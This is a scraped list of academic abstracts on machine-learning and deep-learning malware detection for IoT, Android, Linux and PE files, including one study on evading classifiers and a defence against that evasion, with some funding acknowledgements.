The proliferation of Internet of Things(IoT)devices has established edge computing as a critical paradigm for real-time data analysis and low-latency processing.Nevertheless,the distributed nature of edge computing pr...The proliferation of Internet of Things(IoT)devices has established edge computing as a critical paradigm for real-time data analysis and low-latency processing.Nevertheless,the distributed nature of edge computing presents substantial security challenges,rendering it a prominent target for sophisticated malware attacks.Existing signature-based and behavior-based detection methods are ineffective against the swiftly evolving nature of malware threats and are constrained by the availability of resources.This paper suggests the Genetic Encoding for Novel Optimization of Malware Evaluation(GENOME)framework,a novel solution that is intended to improve the performance of malware detection and classification in peripheral computing environments.GENOME optimizes data storage and computa-tional efficiency by converting malware artifacts into compact,structured sequences through a Deoxyribonucleic Acid(DNA)encoding mechanism.The framework employs two DNA encoding algorithms,standard and compressed,which substantially reduce data size while preserving high detection accuracy.The Edge-IIoTset dataset was used to conduct experiments that showed that GENOME was able to achieve high classification performance using models such as Random Forest and Logistic Regression,resulting in a reduction of data size by up to 42%.Further evaluations with the CIC-IoT-23 dataset and Deep Learning models confirmed GENOME’s scalability and adaptability across diverse datasets and algorithms.The potential of GENOME to address critical challenges,such as the rapid mutation of malware,real-time processing demands,and resource limitations,is emphasized in this study.GENOME offers comprehensive protection for peripheral computing environments by offering a security solution that is both efficient and scalable.展开更多
With the proliferation of Android malware,the issue of traceability in malware analysis has emerged as a significant problem that requires exploration.By establishing links between newly discovered,unreported malware ...With the proliferation of Android malware,the issue of traceability in malware analysis has emerged as a significant problem that requires exploration.By establishing links between newly discovered,unreported malware and prior knowledge from existing malware data pools,security analysts can gain a better understanding of the evolution process of malware and its underlying reasons.However,in real-world scenarios,analyzing the traceability of malware can be complex and time-consuming due to the large volume of existing malware data,requiring extensive manual analysis.Furthermore,the results obtained from such analysis often lack explanation.Therefore,there is a pressing need to develop a comprehensive automated malware tracking system that can provide detailed insights into the tracking and evolution process of malware and offer strong explanatory capabilities.In this paper,we propose a knowledge graph-based approach that uses partial API call graphs comprising semantic and behavioral features to reveal the traceability relations among malware and provide explainable results for these relations.Our approach is implemented on a dataset of over 20,000 malware samples labeled with family information,spanning a time period of 10 years.To address the challenges associated with the complexity of analysis,we leverage prior knowledge from existing malware research and a branch pruning method on call graphs to reduce computational complexity and enhance the precision of explanations when determining traceability relations.展开更多
In recent years,cyber threats have escalated across diverse sectors,with cybercrime syndicates increasingly exploiting system vulnerabilities.Traditional passive defense mechanisms have proven insufficient,particularl...In recent years,cyber threats have escalated across diverse sectors,with cybercrime syndicates increasingly exploiting system vulnerabilities.Traditional passive defense mechanisms have proven insufficient,particularly as Linux platforms—historically overlooked in favor of Windows—have emerged as frequent targets.According to Trend Micro,there has been a substantial increase in Linux-targeted malware,with ransomware attacks on Linux surpassing those on macOS.This alarming trend underscores the need for detection strategies specifically designed for Linux environments.To address this challenge,this study proposes a comprehensive malware detection framework tailored for Linux systems,integrating dynamic behavioral analysis with the semantic reasoning capabilities of large language models(LLMs).Malware samples are executed within sandbox environments to extract behavioral features such as system calls and command-line executions.These features are then systematically mapped to the MITRE ATT&CK framework,incorporating its defined data sources,data components,and Tactics,Techniques,and Procedures(TTPs).Two mapping constructs—Conceptual Definition Mapping and TTP Technical Keyword Mapping—are developed from official MITRE documentation.These resources are utilized to fine-tune an LLM,enabling it to semantically interpret complex behavioral patterns and infer associated attack techniques,including those employed by previously unknown malware variants.The resulting detection pipeline effectively bridges raw behavioral data with structured threat intelligence.Experimental evaluations confirm the efficacy of the proposed system,with the fine-tuned Gemma 2B model demonstrating significantly enhanced accuracy in associating behavioral features with ATT&CK-defined techniques.This study contributes a fully integrated Linux-specific detection framework,a novel approach for transforming unstructured behavioral data into actionable intelligence,improved interpretability of malicious behavior,and a scalable training process for future applications of LLMs in cybersecurity.展开更多
Safeguarding against malware requires precise machine-learning algorithms to classify harmful apps.The Drebin dataset of 15,036 samples and 215 features yielded significant and reliable results for two hybrid models,C...Safeguarding against malware requires precise machine-learning algorithms to classify harmful apps.The Drebin dataset of 15,036 samples and 215 features yielded significant and reliable results for two hybrid models,CNN+XGBoost and KNN+XGBoost.To address the class imbalance issue,SMOTE(Synthetic Minority Oversampling Technique)was used to preprocess the dataset,creating synthetic samples of the minority class(malware)to balance the training set.XGBoost was then used to choose the most essential features for separating malware from benign programs.The models were trained and tested using 6-fold cross-validation,measuring accuracy,precision,recall,F1 score,and ROC AUC.The results are highly dependable,showing that CNN+XGBoost consistently outperforms KNN+XGBoost with an average accuracy of 98.76%compared to 97.89%.The CNN-based malware classification model,with its higher precision,recall,and F1 scores,is a secure choice.CNN+XGBoost,with its fewer all-fold misclassifications in confusion matrices,further solidifies this security.The calibration curve research,confirming the accuracy and cybersecurity applicability of the models’probability projections,adds to the sense of reliability.This study unequivocally demonstrates that CNN+XGBoost is a reliable and effective malware detection system,underlining the importance of feature selection and hybrid models.展开更多
Malware continues to pose a significant threat to cybersecurity,with new advanced infections that go beyond traditional detection.Limitations in existing systems include high false-positive rates,slow system response ...Malware continues to pose a significant threat to cybersecurity,with new advanced infections that go beyond traditional detection.Limitations in existing systems include high false-positive rates,slow system response times,and inability to respond quickly to new malware forms.To overcome these challenges,this paper proposes OMD-RAS:Implementing Malware Detection in an Optimized Way through Real-Time and Adaptive Security as an extensive approach,hoping to get good results towards better malware threat detection and remediation.The significant steps in the model are data collection followed by comprehensive preprocessing consisting of feature engineering and normalization.Static analysis,along with dynamic analysis,is done to capture the whole spectrum of malware behavior for the feature extraction process.The extracted processed features are given with a continuous learning mechanism to the Extreme Learning Machine model of real-time detection.This OMD-RAS trains quickly and has great accuracy,providing elite,advanced real-time detection capabilities.This approach uses continuous learning to adapt to new threats—ensuring the effectiveness of detection even as strategies used by malware may change over time.The experimental results showed that OMD-RAS performs better than the traditional approaches.For instance,the OMD-RAS model has been able to achieve an accuracy of 96.23%and massively reduce the rate of false positives across all datasets while eliciting a consistently high rate of precision and recall.The model’s adaptive learning reflected enhancements on other performance measures-for example,Matthews Correlation Coefficients and Log Loss.展开更多
Over the past few years,Malware attacks have become more and more widespread,posing threats to digital assets throughout the world.Although numerous methods have been developed to detect malicious attacks,these malwar...Over the past few years,Malware attacks have become more and more widespread,posing threats to digital assets throughout the world.Although numerous methods have been developed to detect malicious attacks,these malware detection techniques need to be more efficient in detecting new and progressively sophisticated variants of malware.Therefore,the development of more advanced and accurate techniques is necessary for malware detection.This paper introduces a comprehensive Dual-Channel Attention Deep Bidirectional Long Short-Term Memory(DCADBiLSTM)model for malware detection and riskmitigation.The Dual Channel Attention(DCA)mechanism improves themodel’s capability to concentrate on the features that aremost appropriate in the input data,which reduces the false favourable rates.The Bidirectional Long,Short-Term Memory framework helps capture crucial interdependence from past and future circumstances,which is essential for enhancing the model’s understanding of malware behaviour.As soon as malware is detected,the risk mitigation phase is implemented,which evaluates the severity of each threat and helps mitigate threats earlier.The outcomes of the method demonstrate better accuracy of 98.96%,which outperforms traditional models.It indicates the method detects and mitigates several kinds of malware threats,thereby providing a proactive defence mechanism against the emerging challenges in cybersecurity.展开更多
In the current digital era,new technologies are becoming an essential part of our lives.Consequently,the number ofmalicious software ormalware attacks is rapidly growing.There is no doubt,themajority ofmalware attacks...In the current digital era,new technologies are becoming an essential part of our lives.Consequently,the number ofmalicious software ormalware attacks is rapidly growing.There is no doubt,themajority ofmalware attacks can be detected by most antivirus programs.However,such types of antivirus programs are one step behind malicious software.Due to these dilemmas,deep learning become popular in the detection and classification of malicious data.Therefore,researchers have significantly focused on finding solutions for malware attacks by analyzing malicious samples with the help of different techniques and models.In this research,we presented a lightweight attention-based novel deep Convolutional Neural Network(DNN-CNN)model for binary and multi-class malware classification,including benign,trojan horse,ransomware,and spyware.We applied the Principal Component Analysis(PCA)technique for feature extraction for binary classification.We used the Synthetic Minority Oversampling Technique(SMOTE)to handle the imbalanced data during multi-class classification.Our proposed attention-based malware detectionmodel is trained on the benchmarkmalware memory dataset named CIC-MalMem-2022.Theresults indicate that our model obtained high accuracy for binary and multi-class classification,99.5% and 97.9%,respectively.展开更多
The rapid evolution of malware presents a critical cybersecurity challenge,rendering traditional signature-based detection methods ineffective against novel variants.This growing threat affects individuals,organizatio...The rapid evolution of malware presents a critical cybersecurity challenge,rendering traditional signature-based detection methods ineffective against novel variants.This growing threat affects individuals,organizations,and governments,highlighting the urgent need for robust malware detection mechanisms.Conventional machine learning-based approaches rely on static and dynamicmalware analysis and often struggle to detect previously unseen threats due to their dependency on predefined signatures.Although machine learning algorithms(MLAs)offer promising detection capabilities,their reliance on extensive feature engineering limits real-time applicability.Deep learning techniques mitigate this issue by automating feature extraction but may introduce computational overhead,affecting deployment efficiency.This research evaluates classical MLAs and deep learningmodels to enhance malware detection performance across diverse datasets.The proposed approach integrates a novel text and imagebased detection framework,employing an optimized Support Vector Machine(SVM)for textual data analysis and EfficientNet-B0 for image-based malware classification.Experimental analysis,conducted across multiple train-test splits over varying timescales,demonstrates 99.97%accuracy on textual datasets using SVM and 96.7%accuracy on image-based datasets with EfficientNet-B0,significantly improving zero-day malware detection.Furthermore,a comparative analysis with existing competitive techniques,such as Random Forest,XGBoost,and CNN-based(Convolutional Neural Network)classifiers,highlights the superior performance of the proposed model in terms of accuracy,efficiency,and robustness.展开更多
The growing complexity of cyber threats requires innovative machine learning techniques,and image-based malware classification opens up new possibilities.Meanwhile,existing research has largely overlooked the impact o...The growing complexity of cyber threats requires innovative machine learning techniques,and image-based malware classification opens up new possibilities.Meanwhile,existing research has largely overlooked the impact of noise and obfuscation techniques commonly employed by malware authors to evade detection,and there is a critical gap in using noise simulation as a means of replicating real-world malware obfuscation techniques and adopting denoising framework to counteract these challenges.This study introduces an image denoising technique based on a U-Net combined with a GAN framework to address noise interference and obfuscation challenges in image-based malware analysis.The proposed methodology addresses existing classification limitations by introducing noise addition,which simulates obfuscated malware,and denoising strategies to restore robust image representations.To evaluate the approach,we used multiple CNN-based classifiers to assess noise resistance across architectures and datasets,measuring significant performance variation.Our denoising technique demonstrates remarkable performance improvements across two multi-class public datasets,MALIMG and BIG-15.For example,the MALIMG classification accuracy improved from 23.73%to 88.84%with denoising applied after Gaussian noise injection,demonstrating robustness.This approach contributes to improving malware detection by offering a robust framework for noise-resilient classification in noisy conditions.展开更多
The growing threat of malware,particularly in the Portable Executable(PE)format,demands more effective methods for detection and classification.Machine learning-based approaches exhibit their potential but often negle...The growing threat of malware,particularly in the Portable Executable(PE)format,demands more effective methods for detection and classification.Machine learning-based approaches exhibit their potential but often neglect semantic segmentation of malware files that can improve classification performance.This research applies deep learning to malware detection,using Convolutional Neural Network(CNN)architectures adapted to work with semantically extracted data to classify malware into malware families.Starting from the Malconv model,this study introduces modifications to adapt it to multi-classification tasks and improve its performance.It proposes a new innovative method that focuses on byte extraction from Portable Executable(PE)malware files based on their semantic location,resulting in higher accuracy in malware classification than traditional methods using full-byte sequences.This novel approach evaluates the importance of each semantic segment to improve classification accuracy.The results revealed that the header segment of PE files provides the most valuable information for malware identification,outperforming the other sections,and achieving an average classification accuracy of 99.54%.The above reaffirms the effectiveness of the semantic segmentation approach and highlights the critical role header data plays in improving malware detection and classification accuracy.展开更多
Detecting cyber attacks in networks connected to the Internet of Things(IoT)is of utmost importance because of the growing vulnerabilities in the smart environment.Conventional models,such as Naive Bayes and support v...Detecting cyber attacks in networks connected to the Internet of Things(IoT)is of utmost importance because of the growing vulnerabilities in the smart environment.Conventional models,such as Naive Bayes and support vector machine(SVM),as well as ensemble methods,such as Gradient Boosting and eXtreme gradient boosting(XGBoost),are often plagued by high computational costs,which makes it challenging for them to perform real-time detection.In this regard,we suggested an attack detection approach that integrates Visual Geometry Group 16(VGG16),Artificial Rabbits Optimizer(ARO),and Random Forest Model to increase detection accuracy and operational efficiency in Internet of Things(IoT)networks.In the suggested model,the extraction of features from malware pictures was accomplished with the help of VGG16.The prediction process is carried out by the random forest model using the extracted features from the VGG16.Additionally,ARO is used to improve the hyper-parameters of the random forest model of the random forest.With an accuracy of 96.36%,the suggested model outperforms the standard models in terms of accuracy,F1-score,precision,and recall.The comparative research highlights our strategy’s success,which improves performance while maintaining a lower computational cost.This method is ideal for real-time applications,but it is effective.展开更多
The analysis of Android malware shows that this threat is constantly increasing and is a real threat to mobile devices since traditional approaches,such as signature-based detection,are no longer effective due to the ...The analysis of Android malware shows that this threat is constantly increasing and is a real threat to mobile devices since traditional approaches,such as signature-based detection,are no longer effective due to the continuously advancing level of sophistication.To resolve this problem,efficient and flexible malware detection tools are needed.This work examines the possibility of employing deep CNNs to detect Android malware by transforming network traffic into image data representations.Moreover,the dataset used in this study is the CIC-AndMal2017,which contains 20,000 instances of network traffic across five distinct malware categories:a.Trojan,b.Adware,c.Ransomware,d.Spyware,e.Worm.These network traffic features are then converted to image formats for deep learning,which is applied in a CNN framework,including the VGG16 pre-trained model.In addition,our approach yielded high performance,yielding an accuracy of 0.92,accuracy of 99.1%,precision of 98.2%,recall of 99.5%,and F1 score of 98.7%.Subsequent improvements to the classification model through changes within the VGG19 framework improved the classification rate to 99.25%.Through the results obtained,it is clear that CNNs are a very effective way to classify Android malware,providing greater accuracy than conventional techniques.The success of this approach also shows the applicability of deep learning in mobile security along with the direction for the future advancement of the real-time detection system and other deeper learning techniques to counter the increasing number of threats emerging in the future.展开更多
In today’s digital world,the Internet of Things(IoT)plays an important role in both local and global economies due to its widespread adoption in different applications.This technology has the potential to offer sever...In today’s digital world,the Internet of Things(IoT)plays an important role in both local and global economies due to its widespread adoption in different applications.This technology has the potential to offer several advantages over conventional technologies in the near future.However,the potential growth of this technology also attracts attention from hackers,which introduces new challenges for the research community that range from hardware and software security to user privacy and authentication.Therefore,we focus on a particular security concern that is associated with malware detection.The literature presents many countermeasures,but inconsistent results on identical datasets and algorithms raise concerns about model biases,training quality,and complexity.This highlights the need for an adaptive,real-time learning framework that can effectively mitigate malware threats in IoT applications.To address these challenges,(i)we propose an intelligent framework based on Two-step Deep Reinforcement Learning(TwStDRL)that is capable of learning and adapting in real-time to counter malware threats in IoT applications.This framework uses exploration and exploitation phenomena during both the training and testing phases by storing results in a replay memory.The stored knowledge allows the model to effectively navigate the environment and maximize cumulative rewards.(ii)To demonstrate the superiority of the TwStDRL framework,we implement and evaluate several machine learning algorithms for comparative analysis that include Support Vector Machines(SVM),Multi-Layer Perceptron,Random Forests,and k-means Clustering.The selection of these algorithms is driven by the inconsistent results reported in the literature,which create doubt about their robustness and reliability in real-world IoT deployments.(iii)Finally,we provide a comprehensive evaluation to justify why the TwStDRL framework outperforms them in mitigating security threats.During analysis,we noted that our proposed TwStDRL scheme achieves an average performance of 99.45%across accuracy,precision,recall,and F1-score,which is an absolute improvement of roughly 3%over the existing malware-detection models.展开更多
The dominance of Android in the global mobile market and the open development characteristics of this platform have resulted in a significant increase in malware.These malicious applications have become a serious conc...The dominance of Android in the global mobile market and the open development characteristics of this platform have resulted in a significant increase in malware.These malicious applications have become a serious concern to the security of Android systems.To address this problem,researchers have proposed several machine-learning models to detect and classify Android malware based on analyzing features extracted from Android samples.However,most existing studies have focused on the classification task and overlooked the feature selection process,which is crucial to reduce the training time and maintain or improve the classification results.The current paper proposes a new Android malware detection and classification approach that identifies the most important features to improve classification performance and reduce training time.The proposed approach consists of two main steps.First,a feature selection method based on the Attention mechanism is used to select the most important features.Then,an optimized Light Gradient Boosting Machine(LightGBM)classifier is applied to classify the Android samples and identify the malware.The feature selection method proposed in this paper is to integrate an Attention layer into a multilayer perceptron neural network.The role of the Attention layer is to compute the weighted values of each feature based on its importance for the classification process.Experimental evaluation of the approach has shown that combining the Attention-based technique with an optimized classification algorithm for Android malware detection has improved the accuracy from 98.64%to 98.71%while reducing the training time from 80 to 28 s.展开更多
Detecting malware on mobile devices using the Android operating system has become a critical challenge in the field of cybersecurity,in the context of the rapid increase in the number of malware variants and the frequ...Detecting malware on mobile devices using the Android operating system has become a critical challenge in the field of cybersecurity,in the context of the rapid increase in the number of malware variants and the frequency of attacks targeting Android devices.In this paper,we propose a novel intelligent computational method to enhance the effectiveness of Android malware detection models.The proposed method combines two main techniques:(1)constructing a malware behavior profile and(2)extracting features from the malware behavior profile using graph neural networks.Specifically,to effectively construct an Android malware behavior profile,this paper proposes an information enrichment technique for the function call graph of malware files,based on new graph-structured features and semantic features of the malware’s source code.Additionally,to extract significant features from the constructed behavior profile,the study proposes using the GraphSAGE graph neural network.With this novel intelligent computational method,a variety of significant features of the malware have been effectively represented,synthesized,and extracted.The approach to detecting Android malware proposed in this paper is a new study and has not been explored in previous research.The experimental results on a dataset of 40,819 Android software indicate that the proposed method performs well across all metrics,with particularly impressive accuracy and recall scores of 99.03%and 99.19%,respectively,which outperforms existing state-of-the-art methods.展开更多
The widespread adoption of Internet of Things(IoT)devices has resulted in notable progress in different fields,improving operational effectiveness while also raising concerns about privacy due to their vulnerability t...The widespread adoption of Internet of Things(IoT)devices has resulted in notable progress in different fields,improving operational effectiveness while also raising concerns about privacy due to their vulnerability to virus attacks.Further,the study suggests using an advanced approach that utilizes machine learning,specifically the Wide Residual Network(WRN),to identify hidden malware in IoT systems.The research intends to improve privacy protection by accurately identifying malicious software that undermines the security of IoT devices,using the MalMemAnalysis dataset.Moreover,thorough experimentation provides evidence for the effectiveness of the WRN-based strategy,resulting in exceptional performance measures such as accuracy,precision,F1-score,and recall.The study of the test data demonstrates highly impressive results,with a multiclass accuracy surpassing 99.97%and a binary class accuracy beyond 99.98%.The results emphasize the strength and dependability of using advanced deep learning methods such as WRN for identifying hidden malware risks in IoT environments.Furthermore,a comparison examination with the current body of literature emphasizes the originality and efficacy of the suggested methodology.This research builds upon previous studies that have investigated several machine learning methods for detecting malware on IoT devices.However,it distinguishes itself by showcasing exceptional performance metrics and validating its findings through thorough experimentation with real-world datasets.Utilizing WRN offers benefits in managing the intricacies of malware detection,emphasizing its capacity to enhance the security of IoT ecosystems.To summarize,this work proposes an effective way to address privacy concerns on IoT devices by utilizing advanced machine learning methods.The research provides useful insights into the changing landscape of IoT cybersecurity by emphasizing methodological rigor and conducting comparative performance analysis.Future research could focus on enhancing the recommended approach by adding more datasets and leveraging real-time monitoring capabilities to strengthen IoT devices’defenses against new cybersecurity threats.展开更多
Despite only being around for a few years, mobile devices have steadily risen to become the most extensively used computer devices. Given the number of people who rely on smartphones, which can install third-party app...Despite only being around for a few years, mobile devices have steadily risen to become the most extensively used computer devices. Given the number of people who rely on smartphones, which can install third-party apps, it has become an increasingly important issue for end-users and service providers to ensure that both the devices and the underlying network are secure. People will become more reliant on applications such as SMS, MMS, Internet Access, Online Transactions, and so on due to such features and capabilities. Thousands of devices ranging from low-cost phones to high-end luxury phones are powered by the Android operating system, which has dominated the smartphone marketplace. It is about making it possible for people from all socioeconomic backgrounds to get and use mobile devices in their daily activities. In response to this growing popularity, the number of new applications introduced to the Android market has skyrocketed. The recent appearance of a wide range of mobile malware has caught the attention of security professionals and scholars alike. In light of the ongoing expansion of the mobile phone industry, the likelihood of it being used in criminal activities will only continue to rise in the future. This article reviews the literature on malware detection and prevention in Android mobile devices, analyzes the existing literature on major studies and tasks, and covers articles, journals, and digital resources such as Internet security publications, scientific studies, and conferences.展开更多
The growing usage of Android smartphones has led to a significant rise in incidents of Android malware andprivacy breaches.This escalating security concern necessitates the development of advanced technologies capable...The growing usage of Android smartphones has led to a significant rise in incidents of Android malware andprivacy breaches.This escalating security concern necessitates the development of advanced technologies capableof automatically detecting andmitigatingmalicious activities in Android applications(apps).Such technologies arecrucial for safeguarding user data and maintaining the integrity of mobile devices in an increasingly digital world.Current methods employed to detect sensitive data leaks in Android apps are hampered by two major limitationsthey require substantial computational resources and are prone to a high frequency of false positives.This meansthat while attempting to identify security breaches,these methods often consume considerable processing powerand mistakenly flag benign activities as malicious,leading to inefficiencies and reduced reliability in malwaredetection.The proposed approach includes a data preprocessing step that removes duplicate samples,managesunbalanced datasets,corrects inconsistencies,and imputes missing values to ensure data accuracy.The Minimaxmethod is then used to normalize numerical data,followed by feature vector extraction using the Gain ratio andChi-squared test to identify and extract the most significant characteristics using an appropriate prediction model.This study focuses on extracting a subset of attributes best suited for the task and recommending a predictivemodel based on domain expert opinion.The proposed method is evaluated using Drebin and TUANDROMDdatasets containing 15,036 and 4,464 benign and malicious samples,respectively.The empirical result shows thatthe RandomForest(RF)and Support VectorMachine(SVC)classifiers achieved impressive accuracy rates of 98.9%and 98.8%,respectively,in detecting unknown Androidmalware.A sensitivity analysis experiment was also carriedout on all three ML-based classifiers based on MAE,MSE,R2,and sensitivity parameters,resulting in a flawlessperformance for both datasets.This approach has substantial potential for real-world applications and can serve asa valuable tool for preventing the spread of Androidmalware and enhancing mobile device security.展开更多
With the ever-increasing continuous adoption of Industrial Internet of Things(IoT)technologies,security concerns have grown exponentially,especially regarding securing critical infrastructures.This is primarily due to...With the ever-increasing continuous adoption of Industrial Internet of Things(IoT)technologies,security concerns have grown exponentially,especially regarding securing critical infrastructures.This is primarily due to the potential for backdoors to provide unauthorized access,disrupt operations,and compromise sensitive data.Backdoors pose a significant threat to the integrity and security of Industrial IoT setups by exploiting vulnerabilities and bypassing standard authentication processes.Hence its detection becomes of paramount importance.This paper not only investigates the capabilities of Machine Learning(ML)models in identifying backdoor malware but also evaluates the impact of balancing the dataset via resampling techniques,including Synthetic Minority Oversampling Technique(SMOTE),Synthetic Data Vault(SDV),and Conditional Tabular Generative Adversarial Network(CTGAN),and feature reduction such as Pearson correlation coefficient,on the performance of the ML models.Experimental evaluation on the CCCS-CIC-AndMal-2020 dataset demonstrates that the Random Forest(RF)classifier generated an optimal model with 99.98%accuracy when using a balanced dataset created by SMOTE.Additionally,the training and testing time was reduced by approximately 50%when switching from the full feature set to a reduced feature set,without significant performance loss.展开更多
Antivirus vendors and the research community employ Machine Learning(ML)or Deep Learning(DL)-based static analysis techniques for efficient identification of new threats,given the continual emergence of novel malware ...Antivirus vendors and the research community employ Machine Learning(ML)or Deep Learning(DL)-based static analysis techniques for efficient identification of new threats,given the continual emergence of novel malware variants.On the other hand,numerous researchers have reported that Adversarial Examples(AEs),generated by manipulating previously detected malware,can successfully evade ML/DL-based classifiers.Commercial antivirus systems,in particular,have been identified as vulnerable to such AEs.This paper firstly focuses on conducting black-box attacks to circumvent ML/DL-based malware classifiers.Our attack method utilizes seven different perturbations,including Overlay Append,Section Append,and Break Checksum,capitalizing on the ambiguities present in the PE format,as previously employed in evasion attack research.By directly applying the perturbation techniques to PE binaries,our attack method eliminates the need to grapple with the problem-feature space dilemma,a persistent challenge in many evasion attack studies.Being a black-box attack,our method can generate AEs that successfully evade both DL-based and ML-based classifiers.Also,AEs generated by the attack method retain their executability and malicious behavior,eliminating the need for functionality verification.Through thorogh evaluations,we confirmed that the attack method achieves an evasion rate of 65.6%against well-known ML-based malware detectors and can reach a remarkable 99%evasion rate against well-known DL-based malware detectors.Furthermore,our AEs demonstrated the capability to bypass detection by 17%of vendors out of the 64 on VirusTotal(VT).In addition,we propose a defensive approach that utilizes Trend Locality Sensitive Hashing(TLSH)to construct a similarity-based defense model.Through several experiments on the approach,we verified that our defense model can effectively counter AEs generated by the perturbation techniques.In conclusion,our defense model alleviates the limitation of the most promising defense method,adversarial training,which is only effective against the AEs that are included in the training classifiers.展开更多
基金supported by the Institute of Information&Communications Technology Planning&Evaluation(IITP)(Project Nos.RS-2024-00438551,30%,2022-11220701,30%,2021-0-01816,30%)the National Research Foundation of Korea(NRF)grant funded by the Korean Government(Project No.RS2023-00208460,10%).
文摘The proliferation of Internet of Things(IoT)devices has established edge computing as a critical paradigm for real-time data analysis and low-latency processing.Nevertheless,the distributed nature of edge computing presents substantial security challenges,rendering it a prominent target for sophisticated malware attacks.Existing signature-based and behavior-based detection methods are ineffective against the swiftly evolving nature of malware threats and are constrained by the availability of resources.This paper suggests the Genetic Encoding for Novel Optimization of Malware Evaluation(GENOME)framework,a novel solution that is intended to improve the performance of malware detection and classification in peripheral computing environments.GENOME optimizes data storage and computa-tional efficiency by converting malware artifacts into compact,structured sequences through a Deoxyribonucleic Acid(DNA)encoding mechanism.The framework employs two DNA encoding algorithms,standard and compressed,which substantially reduce data size while preserving high detection accuracy.The Edge-IIoTset dataset was used to conduct experiments that showed that GENOME was able to achieve high classification performance using models such as Random Forest and Logistic Regression,resulting in a reduction of data size by up to 42%.Further evaluations with the CIC-IoT-23 dataset and Deep Learning models confirmed GENOME’s scalability and adaptability across diverse datasets and algorithms.The potential of GENOME to address critical challenges,such as the rapid mutation of malware,real-time processing demands,and resource limitations,is emphasized in this study.GENOME offers comprehensive protection for peripheral computing environments by offering a security solution that is both efficient and scalable.
文摘With the proliferation of Android malware,the issue of traceability in malware analysis has emerged as a significant problem that requires exploration.By establishing links between newly discovered,unreported malware and prior knowledge from existing malware data pools,security analysts can gain a better understanding of the evolution process of malware and its underlying reasons.However,in real-world scenarios,analyzing the traceability of malware can be complex and time-consuming due to the large volume of existing malware data,requiring extensive manual analysis.Furthermore,the results obtained from such analysis often lack explanation.Therefore,there is a pressing need to develop a comprehensive automated malware tracking system that can provide detailed insights into the tracking and evolution process of malware and offer strong explanatory capabilities.In this paper,we propose a knowledge graph-based approach that uses partial API call graphs comprising semantic and behavioral features to reveal the traceability relations among malware and provide explainable results for these relations.Our approach is implemented on a dataset of over 20,000 malware samples labeled with family information,spanning a time period of 10 years.To address the challenges associated with the complexity of analysis,we leverage prior knowledge from existing malware research and a branch pruning method on call graphs to reduce computational complexity and enhance the precision of explanations when determining traceability relations.
基金supported by the National Science and Technology Council under grant number 113-2221-E-027-126-MY3.
文摘In recent years,cyber threats have escalated across diverse sectors,with cybercrime syndicates increasingly exploiting system vulnerabilities.Traditional passive defense mechanisms have proven insufficient,particularly as Linux platforms—historically overlooked in favor of Windows—have emerged as frequent targets.According to Trend Micro,there has been a substantial increase in Linux-targeted malware,with ransomware attacks on Linux surpassing those on macOS.This alarming trend underscores the need for detection strategies specifically designed for Linux environments.To address this challenge,this study proposes a comprehensive malware detection framework tailored for Linux systems,integrating dynamic behavioral analysis with the semantic reasoning capabilities of large language models(LLMs).Malware samples are executed within sandbox environments to extract behavioral features such as system calls and command-line executions.These features are then systematically mapped to the MITRE ATT&CK framework,incorporating its defined data sources,data components,and Tactics,Techniques,and Procedures(TTPs).Two mapping constructs—Conceptual Definition Mapping and TTP Technical Keyword Mapping—are developed from official MITRE documentation.These resources are utilized to fine-tune an LLM,enabling it to semantically interpret complex behavioral patterns and infer associated attack techniques,including those employed by previously unknown malware variants.The resulting detection pipeline effectively bridges raw behavioral data with structured threat intelligence.Experimental evaluations confirm the efficacy of the proposed system,with the fine-tuned Gemma 2B model demonstrating significantly enhanced accuracy in associating behavioral features with ATT&CK-defined techniques.This study contributes a fully integrated Linux-specific detection framework,a novel approach for transforming unstructured behavioral data into actionable intelligence,improved interpretability of malicious behavior,and a scalable training process for future applications of LLMs in cybersecurity.
文摘Safeguarding against malware requires precise machine-learning algorithms to classify harmful apps.The Drebin dataset of 15,036 samples and 215 features yielded significant and reliable results for two hybrid models,CNN+XGBoost and KNN+XGBoost.To address the class imbalance issue,SMOTE(Synthetic Minority Oversampling Technique)was used to preprocess the dataset,creating synthetic samples of the minority class(malware)to balance the training set.XGBoost was then used to choose the most essential features for separating malware from benign programs.The models were trained and tested using 6-fold cross-validation,measuring accuracy,precision,recall,F1 score,and ROC AUC.The results are highly dependable,showing that CNN+XGBoost consistently outperforms KNN+XGBoost with an average accuracy of 98.76%compared to 97.89%.The CNN-based malware classification model,with its higher precision,recall,and F1 scores,is a secure choice.CNN+XGBoost,with its fewer all-fold misclassifications in confusion matrices,further solidifies this security.The calibration curve research,confirming the accuracy and cybersecurity applicability of the models’probability projections,adds to the sense of reliability.This study unequivocally demonstrates that CNN+XGBoost is a reliable and effective malware detection system,underlining the importance of feature selection and hybrid models.
基金supported by a grant from the Center of Excellence in Information Assurance(CoEIA),King Saud University(KSU).
文摘Malware continues to pose a significant threat to cybersecurity,with new advanced infections that go beyond traditional detection.Limitations in existing systems include high false-positive rates,slow system response times,and inability to respond quickly to new malware forms.To overcome these challenges,this paper proposes OMD-RAS:Implementing Malware Detection in an Optimized Way through Real-Time and Adaptive Security as an extensive approach,hoping to get good results towards better malware threat detection and remediation.The significant steps in the model are data collection followed by comprehensive preprocessing consisting of feature engineering and normalization.Static analysis,along with dynamic analysis,is done to capture the whole spectrum of malware behavior for the feature extraction process.The extracted processed features are given with a continuous learning mechanism to the Extreme Learning Machine model of real-time detection.This OMD-RAS trains quickly and has great accuracy,providing elite,advanced real-time detection capabilities.This approach uses continuous learning to adapt to new threats—ensuring the effectiveness of detection even as strategies used by malware may change over time.The experimental results showed that OMD-RAS performs better than the traditional approaches.For instance,the OMD-RAS model has been able to achieve an accuracy of 96.23%and massively reduce the rate of false positives across all datasets while eliciting a consistently high rate of precision and recall.The model’s adaptive learning reflected enhancements on other performance measures-for example,Matthews Correlation Coefficients and Log Loss.
基金funded by the Deanship of Scientific Research(DSR)at King Abdulaziz University,Jeddah,under grant No.(IPP:421-611-2025).
